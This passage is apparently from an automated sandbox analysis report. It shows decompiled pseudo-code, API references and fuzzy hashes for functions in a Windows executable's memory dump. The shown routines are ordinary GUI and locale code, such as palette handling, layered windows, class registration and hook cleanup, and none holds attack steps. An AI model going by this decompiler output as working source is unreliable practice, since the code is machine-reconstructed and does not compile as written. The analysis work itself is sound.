Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CaptureLongWindow
String ID:
API String ID: 1158686931-0
Opcode ID: 5e0c0322ffd41ed8ffe50e6811b60277c83cf391d51247fabccce89aca0e8f16
Instruction ID: 692a41f2d512956f4ac2e3d47556f8183bcaa3c67a57267c608a671e3ecc12fe
Opcode Fuzzy Hash: 5e0c0322ffd41ed8ffe50e6811b60277c83cf391d51247fabccce89aca0e8f16
Instruction Fuzzy Hash: DC1151B120560A9FD620BA5EC940B2773DCDB15355B50043EFE5AE3353EE28FC08836A

Uniqueness

Uniqueness Score: -1.00%

Function 00424A88, Relevance: 7.6, APIs: 5, Instructions: 66
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00424A88(struct HPALETTE__* __eax) {
				struct HPALETTE__* _t21;
				char _t28;
				signed int _t30;
				struct HPALETTE__* _t36;
				struct HPALETTE__* _t37;
				struct HDC__* _t38;
				intOrPtr _t39;

				_t21 = __eax;
				_t36 = __eax;
				_t39 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t39 + 0x14));
					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
						E00423408(_t22);
					}
					_t21 = E00420D2C( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
					_t37 = _t21;
					 *(_t39 + 0x10) = _t37;
					if(_t37 == 0) {
						_push(0);
						L00406E30();
						_t21 = E0042063C(_t21);
						_t38 = _t21;
						if( *((char*)(_t39 + 0x71)) != 0) {
							L9:
							_t28 = 1;
						} else {
							_push(0xc);
							_push(_t38);
							L00406B00();
							_push(0xe);
							_push(_t38);
							L00406B00();
							_t30 = _t21 * _t21;
							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
							if(_t30 < _t21) {
								goto L9;
							} else {
								_t28 = 0;
							}
						}
						 *((char*)(_t39 + 0x71)) = _t28;
						if(_t28 != 0) {
							_t21 = CreateHalftonePalette(_t38);
							 *(_t39 + 0x10) = _t21;
						}
						_push(_t38);
						_push(0);
						L00407090();
						if( *(_t39 + 0x10) == 0) {
							 *((char*)(_t36 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}

0x00424a88
0x00424a8c
0x00424a8e
0x00424a95
0x00424aaf
0x00424ab5
0x00424ab7
0x00424ab7
0x00424ace
0x00424ad3
0x00424ad5
0x00424ada
0x00424adc
0x00424ade
0x00424ae3
0x00424ae8
0x00424aee
0x00424b17
0x00424b17
0x00424af0
0x00424af0
0x00424af2
0x00424af3
0x00424afa
0x00424afc
0x00424afd
0x00424b02
0x00424b0d
0x00424b11
0x00000000
0x00424b13
0x00424b13
0x00424b13
0x00424b11
0x00424b19
0x00424b1e
0x00424b21
0x00424b26
0x00424b26
0x00424b29
0x00424b2a
0x00424b2c
0x00424b35
0x00424b37
0x00000000
0x00424b37
0x00424b35
0x00424ada
0x00424b3f

APIs

7378AC50.USER32(00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424ADE
7378AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424AF3
7378AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424AFD
CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424B21
7378B380.USER32(00000000,00000000,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424B2C

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 7378$B380CreateHalftonePalette
String ID:
API String ID: 2666310534-0
Opcode ID: 0e769c16af81a4abf07060273bde6f3e8affae6b7ea13075f9f2cc1ce535cd8e
Instruction ID: 5da82dee5c179023c5e14cd6fbcfed6966ad1e16084388927fb4574cc5acc68a
Opcode Fuzzy Hash: 0e769c16af81a4abf07060273bde6f3e8affae6b7ea13075f9f2cc1ce535cd8e
Instruction Fuzzy Hash: D411B7217052759AEB20EF36A4817EF7E90EB51355F80012AF80497682D7B8EC91C3A9

Uniqueness

Uniqueness Score: -1.00%

Function 00455FE4, Relevance: 7.6, APIs: 5, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00455FE4(void* __eax) {
				void* _t16;
				void* _t37;
				void* _t38;
				signed int _t41;

				_t16 = __eax;
				_t38 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x471b20 != 0) {
					_t16 = E0043F674(__eax);
					if(_t16 != 0) {
						_t41 = GetWindowLongA(E0043F370(_t38), 0xffffffec);
						if( *((char*)(_t38 + 0x2e0)) != 0 ||  *((char*)(_t38 + 0x2e2)) != 0) {
							if((_t41 & 0x00080000) == 0) {
								SetWindowLongA(E0043F370(_t38), 0xffffffec, _t41 | 0x00080000);
							}
							return  *0x471b20(E0043F370(_t38),  *((intOrPtr*)(_t38 + 0x2e4)),  *((intOrPtr*)(_t38 + 0x2e1)),  *0x00471BA4 |  *0x00471BAC);
						} else {
							SetWindowLongA(E0043F370(_t38), 0xffffffec, _t41 & 0xfff7ffff);
							_push(0x485);
							_push(0);
							_push(0);
							_t37 = E0043F370(_t38);
							_push(_t37);
							L00407068();
							return _t37;
						}
					}
				}
				return _t16;
			}

0x00455fe4
0x00455fe6
0x00455fec
0x00456001
0x00456008
0x0045601d
0x00456026
0x00456037
0x0045604a
0x0045604a
0x00000000
0x0045608c
0x0045609d
0x004560a2
0x004560a7
0x004560a9
0x004560ad
0x004560b2
0x004560b3
0x00000000
0x004560b3
0x00456026
0x00456008
0x004560ba

APIs

GetWindowLongA.USER32 ref: 00456018
SetWindowLongA.USER32 ref: 0045604A
SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,00453C50), ref: 00456084
SetWindowLongA.USER32 ref: 0045609D
7378B330.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,00453C50), ref: 004560B3

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$7378AttributesB330Layered
String ID:
API String ID: 3858242083-0
Opcode ID: 2deb61a0238565db0f64e6d34c20662e8747d994625db548357045a5d890eb10
Instruction ID: ccda71b2ec37f1bb124b02cfe36db7acdd109c0cd4e888212a433b47f4873f41
Opcode Fuzzy Hash: 2deb61a0238565db0f64e6d34c20662e8747d994625db548357045a5d890eb10
Instruction Fuzzy Hash: F611A360E4469069DB50AE7D8C89B8A264C1B09355F59257ABC49EB3E3C76CD88CC36C

Uniqueness

Uniqueness Score: -1.00%

Function 0041CE6C, Relevance: 7.6, APIs: 5, Instructions: 60
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041CE6C(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				CHAR* _t14;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;

				_t6 =  *0x48f714; // 0x400000
				 *0x4714d0 = _t6;
				_t8 =  *0x4714e4; // 0x41ce5c
				_t9 =  *0x48f714; // 0x400000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L00406D08 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x48f714; // 0x400000
						_t20 =  *0x4714e4; // 0x41ce5c
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x4714c0);
				}
				_t13 =  *0x48f714; // 0x400000
				_t14 =  *0x4714e4; // 0x41ce5c
				_t22 = CreateWindowExA(0x80, _t14, 0x41cf1c, 0x80000000, 0, 0, 0, 0, 0, 0, _t13, 0);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E0041CDB0(_a4, _a8));
				}
				return _t22;
			}

0x0041ce73
0x0041ce78
0x0041ce81
0x0041ce87
0x0041ce8d
0x0041ce95
0x0041ce97
0x0041ce9a
0x0041cea8
0x0041ceaa
0x0041ceb0
0x0041ceb6
0x0041ceb6
0x0041cec0
0x0041cec0
0x0041cec7
0x0041cee3
0x0041cef3
0x0041cefa
0x0041cf0b
0x0041cf0b
0x0041cf16

APIs

GetClassInfoA.USER32 ref: 0041CE8D
UnregisterClassA.USER32 ref: 0041CEB6
RegisterClassA.USER32 ref: 0041CEC0
CreateWindowExA.USER32 ref: 0041CEEE
SetWindowLongA.USER32 ref: 0041CF0B

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$Window$CreateInfoLongRegisterUnregister
String ID:
API String ID: 3404767174-0
Opcode ID: 442a9df88b62dff0b0105b08e1ba3c5d5aa1baa634b55fba360c3f68cee1df1f
Instruction ID: a8393ad85677e835f3f75873210baaa383f01e48bbd737e5eb2461ebade1ee17
Opcode Fuzzy Hash: 442a9df88b62dff0b0105b08e1ba3c5d5aa1baa634b55fba360c3f68cee1df1f
Instruction Fuzzy Hash: D5016171644200ABDB10EFA8EDC1FDA339DE709304F144636F909E72E2D735A898876D

Uniqueness

Uniqueness Score: -1.00%

Function 00420C94, Relevance: 7.6, APIs: 5, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00420C94(intOrPtr __eax) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff8;
				_v5 = 0;
				if( *0x48fa28 == 0) {
					return _v5;
				} else {
					_push(0);
					L00406E30();
					_v12 = __eax;
					_push(_t32);
					_push(0x420d1a);
					_push( *[fs:edx]);
					 *[fs:edx] = _t35;
					_push(0x68);
					_t14 = _v12;
					_push(_t14);
					L00406B00();
					if(_t14 >= 0x10) {
						_push(__eax + 4);
						_push(8);
						_push(0);
						_t18 =  *0x48fa28; // 0xab0806ee
						_push(_t18);
						L00406B28();
						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
						_push(8);
						_push(8);
						_t21 =  *0x48fa28; // 0xab0806ee
						_push(_t21);
						L00406B28();
						_v5 = 1;
					}
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(0x420d21);
					_t16 = _v12;
					_push(_t16);
					_push(0);
					L00407090();
					return _t16;
				}
			}

0x00420c95
0x00420c97
0x00420c9d
0x00420ca8
0x00420d28
0x00420caa
0x00420caa
0x00420cac
0x00420cb1
0x00420cb6
0x00420cb7
0x00420cbc
0x00420cbf
0x00420cc2
0x00420cc4
0x00420cc7
0x00420cc8
0x00420cd0
0x00420cd5
0x00420cd6
0x00420cd8
0x00420cda
0x00420cdf
0x00420ce0
0x00420ced
0x00420cee
0x00420cf0
0x00420cf2
0x00420cf7
0x00420cf8
0x00420cfd
0x00420cfd
0x00420d03
0x00420d06
0x00420d09
0x00420d0e
0x00420d11
0x00420d12
0x00420d14
0x00420d19
0x00420d19

APIs

7378AC50.USER32(00000000), ref: 00420CAC
7378AD70.GDI32(?,00000068,00000000,00420D1A,?,00000000), ref: 00420CC8
7378AEA0.GDI32(AB0806EE,00000000,00000008,?,?,00000068,00000000,00420D1A,?,00000000), ref: 00420CE0
7378AEA0.GDI32(AB0806EE,00000008,00000008,?,AB0806EE,00000000,00000008,?,?,00000068,00000000,00420D1A,?,00000000), ref: 00420CF8
7378B380.USER32(00000000,?,00420D21,00420D1A,?,00000000), ref: 00420D14

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 7378$B380
String ID:
API String ID: 817970651-0
Opcode ID: 7285d006103e8762a371f6ad121e6c0eee99bd92478656d37f109c53cece12f1
Instruction ID: 52804b6895c4163ca8fad93a2bbf2a68bdd42c7b971f1a4924c37c131778009b
Opcode Fuzzy Hash: 7285d006103e8762a371f6ad121e6c0eee99bd92478656d37f109c53cece12f1
Instruction Fuzzy Hash: 731108717483046EFB00DBE5AC42F6D7BE8E709714F50846BF504EA1C2D97AA444C328

Uniqueness

Uniqueness Score: -1.00%

Function 00465630, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00465630(int __eax) {
				int _v8;
				int _t20;
				int _t22;
				intOrPtr _t29;
				int _t32;
				intOrPtr _t34;
				intOrPtr _t36;

				_t34 = _t36;
				_t22 = __eax;
				if( *((char*)(__eax + 0x2e8)) == 1) {
					return __eax;
				} else {
					_push(0);
					L00406E30();
					_v8 = __eax;
					_push(_t34);
					_push(0x4656b5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t36;
					_push(0x48);
					_t11 = _v8;
					L00406B00();
					_t32 = MulDiv(E0041F250( *((intOrPtr*)(__eax + 0x68))), _v8, _t11);
					 *(_t22 + 0x2b0) = _t32;
					E0046302C(_t22, MulDiv(_t32, 0x78, 0x64));
					 *((intOrPtr*)(_t22 + 0x2e4)) =  *((intOrPtr*)(_t22 + 0x234));
					_t29 = 0x5a;
					 *[fs:eax] = _t29;
					_push(0x4656bc);
					_t20 = _v8;
					_push(_t20);
					_push(0);
					L00407090();
					return _t20;
				}
			}

0x00465631
0x00465636
0x0046563f
0x004656c0
0x00465641
0x00465641
0x00465643
0x00465648
0x0046564d
0x0046564e
0x00465653
0x00465656
0x00465659
0x0046565d
0x00465661
0x00465675
0x00465677
0x0046568b
0x00465696
0x0046569e
0x004656a1
0x004656a4
0x004656a9
0x004656ac
0x004656ad
0x004656af
0x004656b4
0x004656b4

APIs

7378AC50.USER32(00000000), ref: 00465643
7378AD70.GDI32(?,0000005A,00000048,00000000,004656B5,?,00000000), ref: 00465661

Part of subcall function 0041F250: MulDiv.KERNEL32(00000000,00000048,?), ref: 0041F261

MulDiv.KERNEL32(00000000,00000000,?), ref: 00465670
MulDiv.KERNEL32(00000000,00000078,00000064), ref: 00465682
7378B380.USER32(00000000,?,004656BC,00000000,00000000,?,0000005A,00000048,00000000,004656B5,?,00000000), ref: 004656AF

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 7378$B380
String ID:
API String ID: 817970651-0
Opcode ID: 0773beaff56a00405a6ce37e26b55d55c8904379294a987569536c747724b5cc
Instruction ID: bba66407a661a9468b9e2c443340a47881f8a997fcb6e2684ea967df43eb7c98
Opcode Fuzzy Hash: 0773beaff56a00405a6ce37e26b55d55c8904379294a987569536c747724b5cc
Instruction Fuzzy Hash: FA019EB16457006FE700EB75CC46B9A379CDB04714F5100BAFA08EB282EA79AD10C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00409BC8, Relevance: 7.6, APIs: 5, Instructions: 50
threadCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00409BC8(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x409c5f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E00409940(GetThreadLocale(), 0x409c74, 0x100b,  &_v8);
				_t29 = E00408740(0x409c74, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00409B14, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x48f81c;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00409B50, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E00409C66);
				return E00404320( &_v8);
			}

0x00409bc8
0x00409bcb
0x00409bd0
0x00409bd1
0x00409bd6
0x00409bd9
0x00409bef
0x00409c01
0x00409c0b
0x00409c1b
0x00409c20
0x00409c25
0x00409c2a
0x00409c2a
0x00409c30
0x00409c33
0x00409c33
0x00409c44
0x00409c44
0x00409c4b
0x00409c4e
0x00409c51
0x00409c5e

APIs

GetThreadLocale.KERNEL32(?,00000000,00409C5F,?,?,00000000), ref: 00409BE0

Part of subcall function 00409940: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040995E

GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409C5F,?,?,00000000), ref: 00409C10
EnumCalendarInfoA.KERNEL32(Function_00009B14,00000000,00000000,00000004), ref: 00409C1B
GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409C5F,?,?,00000000), ref: 00409C39
EnumCalendarInfoA.KERNEL32(Function_00009B50,00000000,00000000,00000003), ref: 00409C44

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: b2756358729dd665ab0e9078135860df9401318f844570c34617808faf33e4a2
Instruction ID: 2b6b9a13bd52422c50fd17bad9aef40bb10e6f1d50514e1c8a39be3191c5ba77
Opcode Fuzzy Hash: b2756358729dd665ab0e9078135860df9401318f844570c34617808faf33e4a2
Instruction Fuzzy Hash: 8E01F2B1A042046BE701B6719D12F5E769CDB46728F61453AF501F6AD6D63CAE0082AC

Uniqueness

Uniqueness Score: -1.00%

Function 004575E4, Relevance: 7.5, APIs: 5, Instructions: 25
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004575E4() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x48fc14 != 0) {
					_t10 =  *0x48fc14; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x48fc14 = 0;
				if( *0x48fc18 != 0) {
					_t2 =  *0x48fc10; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x48fc0c) {
						_t8 =  *0x48fc18; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x48fc18; // 0x0
					CloseHandle(_t5);
					 *0x48fc18 = 0;
					return 0;
				}
				return 0;
			}

0x004575eb
0x004575ed
0x004575f3
0x004575f3
0x004575fa
0x00457606
0x00457608
0x0045760e
0x0045761e
0x00457622
0x00457628
0x00457628
0x0045762d
0x00457633
0x0045763a
0x00000000
0x0045763a
0x0045763f

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 004575F3
SetEvent.KERNEL32(00000000,0045988E,00000000,0045896B,?,?,00470838,00000001,00458A2B,?,?,?,00470838), ref: 0045760E
GetCurrentThreadId.KERNEL32 ref: 00457613
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0045988E,00000000,0045896B,?,?,00470838,00000001,00458A2B,?,?,?,00470838), ref: 00457628
CloseHandle.KERNEL32(00000000,00000000,0045988E,00000000,0045896B,?,?,00470838,00000001,00458A2B,?,?,?,00470838), ref: 00457633

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
String ID:
API String ID: 2429646606-0
Opcode ID: 0c9ef34d10a3a34b17f2100b8d050073e33169a6789e8e556c5fa634041fb279
Instruction ID: 428989214356fa18dd56e1ff7b8efdf93b46b12994d6f35e9dabfcb500aced92
Opcode Fuzzy Hash: 0c9ef34d10a3a34b17f2100b8d050073e33169a6789e8e556c5fa634041fb279
Instruction Fuzzy Hash: B1F0F8B15041089AC700FB7EFE49A0E3298B705315B100D3EAA11D72E1CE3896E9CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00459A5C, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 289
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00459A5C(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagPOINT _v32;
				char _v33;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				struct HWND__* _v52;
				intOrPtr _v56;
				char _v60;
				struct tagRECT _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				intOrPtr _v96;
				char _v100;
				struct tagRECT _v116;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				struct HWND__* _t135;
				struct HWND__* _t171;
				intOrPtr _t193;
				char _t199;
				intOrPtr _t223;
				intOrPtr _t227;
				intOrPtr* _t262;
				intOrPtr _t281;
				intOrPtr _t282;
				intOrPtr _t284;
				intOrPtr _t290;
				intOrPtr* _t319;
				intOrPtr _t320;
				void* _t327;

				_t326 = _t327;
				_v144 = 0;
				_v148 = 0;
				asm("movsd");
				asm("movsd");
				_v8 = __eax;
				_t281 =  *0x44fb00; // 0x44fb04
				E00404CFC( &_v100, _t281);
				_t262 =  &_v8;
				_push(_t327);
				_push(0x459e07);
				_push( *[fs:eax]);
				 *[fs:eax] = _t327 + 0xffffff70;
				 *((char*)( *_t262 + 0x58)) = 0;
				if( *((char*)( *_t262 + 0x88)) == 0 ||  *((intOrPtr*)( *_t262 + 0x60)) == 0 || E0044FEB8() == 0 || E0045745C(E00437568( &_v16, 1)) !=  *((intOrPtr*)( *_t262 + 0x60))) {
					L23:
					_t135 = _v52;
					__eflags = _t135;
					if(_t135 <= 0) {
						E00459870( *_t262);
					} else {
						E00459678( *_t262, 0, _t135);
					}
					goto L26;
				} else {
					_v100 =  *((intOrPtr*)( *_t262 + 0x60));
					_v92 = _v16;
					_v88 = _v12;
					_v88 = _v88 + E004598A8();
					_v84 = E00456820();
					_v80 =  *((intOrPtr*)( *_t262 + 0x5c));
					E0043865C( *((intOrPtr*)( *_t262 + 0x60)),  &_v132);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x60)))) + 0x40))();
					_v32.x = 0;
					_v32.y = 0;
					_t319 =  *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x60)) + 0x30));
					_t333 = _t319;
					if(_t319 == 0) {
						_t320 =  *((intOrPtr*)( *_t262 + 0x60));
						_t290 =  *0x434e14; // 0x434e60
						_t171 = E00403740(_t320, _t290);
						__eflags = _t171;
						if(_t171 != 0) {
							__eflags =  *(_t320 + 0x190);
							if( *(_t320 + 0x190) != 0) {
								ClientToScreen( *(_t320 + 0x190),  &_v32);
							}
						}
					} else {
						 *((intOrPtr*)( *_t319 + 0x40))();
					}
					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
					E00438800( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &_v16);
					_v60 = _v140;
					_v56 = _v136;
					E00457424( *((intOrPtr*)( *_t262 + 0x60)),  &_v148);
					E00435DF0(_v148,  &_v140,  &_v144, _t333);
					E004043B8( &_v44, _v144);
					_v52 = 0;
					_v48 =  *((intOrPtr*)( *_t262 + 0x74));
					_t193 =  *0x471b14; // 0x4354a8
					_v96 = _t193;
					_v40 = 0;
					_v33 = E00439EA4( *((intOrPtr*)( *_t262 + 0x60)), 0, 0xb030,  &_v100) == 0;
					if(_v33 != 0 &&  *((short*)( *_t262 + 0x11a)) != 0) {
						 *((intOrPtr*)( *_t262 + 0x118))( &_v100);
					}
					if(_v33 == 0 ||  *((intOrPtr*)( *_t262 + 0x60)) == 0) {
						_t199 = 0;
					} else {
						_t199 = 1;
					}
					_t296 =  *_t262;
					 *((char*)( *_t262 + 0x58)) = _t199;
					if( *((char*)( *_t262 + 0x58)) == 0) {
						goto L23;
					} else {
						_t340 = _v44;
						if(_v44 == 0) {
							goto L23;
						}
						E004599FC(_v96, _t296, _t326);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0x70))();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0xd4))( &_v116, _v40);
						OffsetRect( &_v116, _v92, _v88);
						if(E004037B0( *((intOrPtr*)( *_t262 + 0x84)), _t340) != 0) {
							_v116.left = _v116.left - E00420080( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)) + 0x208)), _v44) + 5;
							_v116.right = _v116.right - E00420080( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)) + 0x208)), _v44) + 5;
						}
						E004387D4( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &_v76);
						_t223 =  *_t262;
						 *((intOrPtr*)(_t223 + 0x64)) = _v140;
						 *((intOrPtr*)(_t223 + 0x68)) = _v136;
						E004387D4( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &(_v76.right));
						_t227 =  *_t262;
						 *((intOrPtr*)(_t227 + 0x6c)) = _v140;
						 *((intOrPtr*)(_t227 + 0x70)) = _v136;
						E00438E5C( *((intOrPtr*)( *_t262 + 0x84)), _v80);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0xd0))(_v40);
						E00457570(_v44);
						_t236 = _v52;
						if(_v52 <= 0) {
							E00459678( *_t262, 1, _v48);
						} else {
							E00459678( *_t262, 0, _t236);
						}
						L26:
						_pop(_t282);
						 *[fs:eax] = _t282;
						_push(0x459e0e);
						E00404344( &_v148, 2);
						_t284 =  *0x44fb00; // 0x44fb04
						return E00404DCC( &_v100, _t284);
					}
				}
			}

0x00459a5d
0x00459a6a
0x00459a70
0x00459a7b
0x00459a7c
0x00459a7d
0x00459a83
0x00459a89
0x00459a8e
0x00459a93
0x00459a94
0x00459a99
0x00459a9c
0x00459aa1
0x00459aae
0x00459dc0
0x00459dc0
0x00459dc3
0x00459dc5
0x00459dd6
0x00459dc7
